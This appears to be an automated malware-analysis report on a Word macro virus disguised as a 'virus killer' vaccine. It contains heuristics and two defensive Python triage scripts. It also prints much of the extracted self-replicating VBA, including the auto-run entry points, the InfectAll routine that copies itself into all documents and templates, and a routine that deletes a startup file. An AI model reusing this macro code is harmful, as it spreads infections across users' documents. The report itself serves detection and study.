Verdict: MALICIOUS
Risk Score: 200

Malware Insights

MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The file carries both legacy WordBasic macro markers and a VBA project whose auto-execution procedures AutoOpen and Document_Open run as soon as the document is opened. The document body is presented as an official notification about technical innovation projects, a common lure to get users to enable macros. The extracted VBA describes itself, in its own comments, as a "macro virus killer" vaccine, but its behaviour is that of a macro virus: on open it calls CloseVirusProtection, and when its ScanVirus check finds no foreign macro code it calls InfectAll, which copies its own code into every open document and every loaded template; AutoNew infects each newly created document, and AutoExit deletes C:\AUTOEXEC.DOT when Word exits. Together with the ClamAV detection, this identifies a self-replicating macro document that executes on open, not a benign utility.
Heuristics (5)

- ClamAV: Doc.Trojan.Jishe-1 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Jishe-1
- Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS): the OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen together with ToolsMacro/MacroFile/fileMacro/globMacro or the names of known historical macro viruses. These Word 6/95 macro forms are not exposed as a modern VBA project, so ordinary VBA source extraction can miss them.
- VBA macros detected [medium] (OLE_VBA_MACROS): the document contains VBA macro code (2 related findings)
  - AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
  - Document_Open macro [high] (OLE_VBA_DOCOPEN)
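The second heuristic points at a gap worth understanding: Word 6/95 stored WordBasic macros outside of what a modern VBA-project parser reads, so a string-level sweep of the raw file is the fallback when olevba returns nothing. The following added example (written for this report; not code from the analyzer or from oletools) does that sweep in Python. The marker list is the one the heuristic names plus the other Word Auto* names; the assumption that the markers appear in the file as plain ASCII or UTF-16LE strings is mine, so both encodings are searched, and the sample blob is constructed for the demonstration rather than taken from a real document.

```python
"""String-level sweep of a raw Word binary (OLE2) file for legacy WordBasic
auto-execution and macro-copy markers, bypassing VBA-project extraction.
Added example for this report, not analyzer or oletools code. Assumption:
markers occur as plain ASCII or UTF-16LE strings; both encodings are searched."""
import re

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # compound-file header signature
AUTO_EXEC_MARKERS = ("AutoExec", "AutoOpen", "AutoClose", "AutoNew", "AutoExit")
# WordBasic statements named by the heuristic; historical macro viruses used
# them to copy themselves between documents and the global template.
MACRO_COPY_MARKERS = ("ToolsMacro", "MacroFile", "FileMacro", "GlobMacro")


def _compile(markers):
    """One case-insensitive pattern per marker that matches it in either encoding."""
    return {m: re.compile(b"(?:" + re.escape(m.encode("ascii")) + b"|"
                          + re.escape(m.encode("utf-16-le")) + b")", re.IGNORECASE)
            for m in markers}


_PATTERNS = _compile(AUTO_EXEC_MARKERS + MACRO_COPY_MARKERS)


def find_markers(blob):
    """Return {marker: [byte offsets]} for every marker present in `blob`."""
    hits = {}
    for name, rx in _PATTERNS.items():
        offsets = [m.start() for m in rx.finditer(blob)]
        if offsets:
            hits[name] = offsets
    return hits


def classify(blob):
    """Mirror the heuristic's logic: an auto-exec name plus a macro-copy statement
    inside an OLE2 file is the legacy macro-virus pattern; either alone is a hint."""
    if not blob.startswith(OLE_MAGIC):
        return "not-ole2"
    hits = find_markers(blob)
    auto = [m for m in AUTO_EXEC_MARKERS if m in hits]
    copy = [m for m in MACRO_COPY_MARKERS if m in hits]
    if auto and copy:
        return "legacy-wordbasic-macro-virus-markers"
    if auto or copy:
        return "suspicious-marker-only"
    return "no-markers"


def scan_file(path):
    """Classify a file on disk; the whole file is read because Word 6/95 macro
    storage is not a separately named stream a VBA parser would hand us."""
    with open(path, "rb") as fh:
        return classify(fh.read())


# Constructed sample (not a real document): OLE2 signature, filler, an ASCII
# "AutoOpen" at offset 24 and a UTF-16LE "ToolsMacro" at offset 40.
SAMPLE_BLOB = (OLE_MAGIC + b"\x00" * 16 + b"AutoOpen" + b"\x00" * 8
               + "ToolsMacro".encode("utf-16-le") + b"\x00" * 4)
CLEAN_BLOB = OLE_MAGIC + b"\x00" * 16 + b"Normal document text" + b"\x00" * 4

if __name__ == "__main__":
    print(find_markers(SAMPLE_BLOB))   # {'AutoOpen': [24], 'ToolsMacro': [40]}
    print(classify(SAMPLE_BLOB))       # legacy-wordbasic-macro-virus-markers
    print(classify(CLEAN_BLOB))        # no-markers
```

A hit list only tells you where to look: a modern VBA document legitimately contains the string AutoOpen, which is why the classification requires an auto-exec name together with a macro-copy statement before it reports the legacy-virus pattern and returns a lone hit as a hint rather than a verdict. The offsets are the starting point for carving the surrounding bytes out for manual inspection.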
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46041 bytes | 7ef35b57547ffbd74c27222bd720df74d76fe50c85f1b8d9258faa47990f21e3 |
Preview: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'This is a macro-virus prevention and removal program I wrote while learning; it can prevent infection by some WORD macro viruses
'It relies on a large set of macro-virus signatures; if you find a macro virus this vaccine cannot handle,
'please contact me promptly. You may also modify this program yourself to strengthen the vaccine
'Fighting viruses is like fighting crime in society: it takes everyone's joint effort
'You are welcome to join and become a fighter; perhaps you are the hero everyone has been waiting for
'Program design: 冀慎华
'Office phone:
'E-mail address: club@263.net
Const answer0 = "FreeWordMacroVirusKiller" 'kept for compatibility with earlier versions
Const answer1 = "MyMacroVirusKillerV1.0"
Const answer2 = "MyMacroVirusKillerV2.0"
Const answer3 = "MyMacroVirusKillerV2.2" 'marker of this program
'Version 2.0
Private Sub Document_Open()
    CloseVirusProtection
    'check whether the opened document contains a virus
    If ScanVirus Then
        Load VirusReport
        VirusReport.Show
    Else
        InfectAll
    End If
End Sub
Attribute VB_Name = "JiShenhua"
'This is a macro-virus prevention and removal program I wrote while learning; it can prevent infection by some WORD macro viruses
'It relies on a large set of macro-virus signatures; if you find a macro virus this vaccine cannot handle,
'please contact me promptly. You may also modify this program yourself to strengthen the vaccine
'Fighting viruses is like fighting crime in society: it takes everyone's joint effort
'You are welcome to join and become a fighter; perhaps you are the hero everyone has been waiting for
'Program design: 冀慎华
'Office phone:
'E-mail address: club@263.net
Option Explicit 'variables must be declared before use
Public pVirusReport As String 'virus description text
Private Const cMyID As String = "MyMacroVirusKiller" 'code marker of this program
Private Const cMyVersion As String = "V2.2" 'version of this program
Private Const cMyModule As String = "JiShenhua" 'module name of this program
Private Const cMyUserForm As String = "VirusReport" 'user-form name of this program
Private Const cLinesofThisDocument As Integer = 24 'number of code lines in the ThisDocument module
Private Const cOK As Integer = 0 'all clear
Private Const cDocHasModuleElse As Integer = 1 'other modules exist
Private Const cDocHasCodeElse As Integer = 2 'other code exists in the ThisDocument module
Private Const cDocHasAllElse As Integer = 3 'other code exists in the ThisDocument module and other modules exist
Private Const cDocProtected As Integer = 4 'the document is protected
Private Const cDocHasOldVersion As Integer = 8 'the document contains an older version of this virus-killer module
'runs automatically when a document is opened
Sub AutoOpen()
    CloseVirusProtection
    'check the opened documents for viruses; if any are found, report to the user
    If ScanVirus Then
        Load VirusReport
        VirusReport.Show
    Else
        InfectAll
    End If
End Sub
'runs automatically when a new document is created
Sub AutoNew()
    CloseVirusProtection
    Infect Word.ActiveDocument
End Sub
'before WORD closes, clean the virus out of the autoexec.dot file
Sub AutoExit()
    Const AutoDotFile = "C:\AUTOEXEC.DOT"
    If Dir(AutoDotFile) <> "" Then
        Kill AutoDotFile
    End If
End Sub
'copy this program's code and modules from the given file into all open documents and templates
Public Function InfectAll() As Boolean
    Dim myDoc As Document, myTemp As Template
    'write this code into the open documents
    For Each myDoc In Documents
        Infect myDoc
    Next myDoc
    'write this code into the WORD templates
    For Each myTemp In Templates
        Infect myTemp
    Next myTemp
    InfectAll = True
End Function
'remove virus modules and code from all open documents and templates
Public Function ClearVirus() As Boolean
    Dim myDoc As Document, myTemp As Template
    Dim Cleared As Boolean
    ClearVirus = True
    'check and clean every document
    For Each myDoc In Documents
        Cleared = ClearDocument(myDoc)
        If Not Cleared Then
            MsgBox "Virus removal was not successful; please check the cause.", vbOKOnly, myDoc.Name
            ClearVirus = False
        End If
    Next myDoc
    'check and clean every template
    For Each myTemp In Templates
        Cleared = ClearDocument(myTemp)
        If Not Cleared Then
            MsgBox "Virus removal was not successful; please check the cause.", vbOKOnly, myTemp.Name
            ClearVirus = False
        End If
    Next myTemp
End Function
'check all open documents and templates for viruses; if any exist, return a virus description string
Public Function ScanVirus() As Boolean
    Dim Ret As Integer, myDoc As Document, myTemp As Template
    ScanVirus = False
    pVirusReport = ""
    'check all open documents for viruses
    For Each myDoc In Documents
        Ret = ScanDocument(myDoc)
        Select Case Ret
            Case cOK, cDocProtected
            Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse, cDocHasOldVersion
                ScanVirus = True
            Case Else
                MsgBox "Function ScanDocument returned an error code the system does not recognize.", vbOKOnly, "System error"
        End Select
    Next myDoc
    'check all templates
    For Each myTemp In Templates
        Ret = ScanDocument(myTemp)
        Select Case Ret
            Case cOK, cDocProtected
```
... (truncated)
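To see why the AutoOpen and Document_Open findings matter more than a keyword hit, the following added example (written for this report; not part of the analyzer or of oletools) walks the call graph of decoded VBA source from each auto-execution entry point and reports what it reaches and which behaviour indicators lie on that path. The input is a constructed abridgement of the preview above that keeps the entry points and the InfectAll/Infect/ScanVirus call structure; the bodies of CloseVirusProtection, Infect and ScanVirus are left empty because the preview truncates before them, so on the real macros.bas they would contribute further indicators. The module layout assumed is olevba's (`Attribute VB_Name` lines between modules), and the indicator names are my own labels.

```python
"""Walk the call graph of decoded VBA source from each auto-execution entry point.
Added example for this report (not analyzer or oletools code). Assumption: input is
plain decoded VBA text as olevba emits it, with Attribute VB_Name lines between modules."""
import re
from collections import deque

# Names Word runs without user action: WordBasic-era Auto* macros and the
# Document_* event handlers of the ThisDocument class module.
AUTO_EXEC = {"autoexec", "autoopen", "autoclose", "autonew", "autoexit",
             "document_open", "document_close", "document_new"}
# Behaviour indicators searched in every procedure body an entry point can reach.
INDICATORS = {
    "iterates all open documents": re.compile(r"\bFor\s+Each\s+\w+\s+In\s+Documents\b", re.I),
    "iterates all loaded templates": re.compile(r"\bFor\s+Each\s+\w+\s+In\s+Templates\b", re.I),
    "writes macro code via VBProject": re.compile(r"\b(?:VBProject|VBComponents|CodeModule)\b", re.I),
    "deletes a file with Kill": re.compile(r"\bKill\b", re.I),
}
MODULE_RE = re.compile(r'^Attribute\s+VB_Name\s*=\s*"([^"]+)"', re.I | re.M)
PROC_RE = re.compile(r"^[ \t]*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\b[^\n]*\n"
                     r"(.*?)^[ \t]*End\s+(?:Sub|Function)\b", re.I | re.M | re.S)
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")


def strip_comments(code):
    """Drop ' comments so names mentioned only in comments do not count as calls
    (approximate: an apostrophe inside a string literal also cuts that line)."""
    return re.sub(r"'[^\n]*", "", code)


def parse_procedures(src):
    """Return {lower_name: {"name", "module", "body"}} for every Sub/Function."""
    marks = list(MODULE_RE.finditer(src))
    chunks = [(m.group(1), src[m.end():marks[i + 1].start() if i + 1 < len(marks) else len(src)])
              for i, m in enumerate(marks)] or [("<unnamed>", src)]
    procs = {}
    for module, code in chunks:
        for m in PROC_RE.finditer(strip_comments(code)):
            procs.setdefault(m.group(1).lower(),
                             {"name": m.group(1), "module": module, "body": m.group(2)})
    return procs


def reachable(procs, start):
    """Breadth-first walk over identifiers that name other procedures; returns the
    set of procedure keys reachable from `start` (start itself excluded)."""
    seen, queue = set(), deque([start])
    while queue:
        for ident in IDENT_RE.findall(procs[queue.popleft()]["body"]):
            key = ident.lower()
            if key in procs and key != start and key not in seen:
                seen.add(key)
                queue.append(key)
    return seen


def triage(src):
    """One record per auto-exec entry point: the procedures it reaches and the
    indicators found anywhere along that path."""
    procs = parse_procedures(src)
    report = []
    for key, p in procs.items():
        if key in AUTO_EXEC:
            reach = reachable(procs, key)
            path_code = "\n".join(procs[k]["body"] for k in reach | {key})
            report.append({"entry": f'{p["module"]}.{p["name"]}',
                           "reaches": sorted(procs[k]["name"] for k in reach),
                           "indicators": [lbl for lbl, rx in INDICATORS.items() if rx.search(path_code)]})
    return report


def propagation_entries(report):
    """Entry points whose path loops over every open document or template:
    the shape of a self-replicating macro rather than a one-off payload."""
    loops = {"iterates all open documents", "iterates all loaded templates"}
    return sorted(r["entry"] for r in report if loops & set(r["indicators"]))


# Constructed sample: an abridgement of the preview above keeping the entry points
# and call structure; CloseVirusProtection, Infect and ScanVirus get empty bodies
# because the preview truncates before them.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    CloseVirusProtection
    If ScanVirus Then VirusReport.Show Else InfectAll
End Sub
Attribute VB_Name = "JiShenhua"
Sub AutoOpen()
    CloseVirusProtection
    If ScanVirus Then VirusReport.Show Else InfectAll
End Sub
Sub AutoNew()
    CloseVirusProtection
    Infect Word.ActiveDocument
End Sub
Sub AutoExit()
    Const AutoDotFile = "C:\AUTOEXEC.DOT"
    If Dir(AutoDotFile) <> "" Then Kill AutoDotFile
End Sub
Public Function InfectAll() As Boolean
    For Each myDoc In Documents
        Infect myDoc
    Next myDoc
    For Each myTemp In Templates
        Infect myTemp
    Next myTemp
    InfectAll = True
End Function
Public Function ScanVirus() As Boolean
    ScanVirus = False
End Function
Sub CloseVirusProtection()
End Sub
Sub Infect(target As Object)
End Sub
'''

if __name__ == "__main__":
    for rec in triage(SAMPLE_VBA):
        print(rec["entry"], "->", rec["reaches"], rec["indicators"])
    print("self-propagating:", propagation_entries(triage(SAMPLE_VBA)))
```

On this sample both Document_Open and AutoOpen reach InfectAll and therefore the Documents and Templates loops, AutoNew reaches Infect directly, and AutoExit carries the Kill indicator on its own; that is the picture the summary above describes, recovered mechanically from the source rather than by reading it. Running the same triage over the full macros.bas would fill in what Infect and CloseVirusProtection actually do, which the preview cuts off.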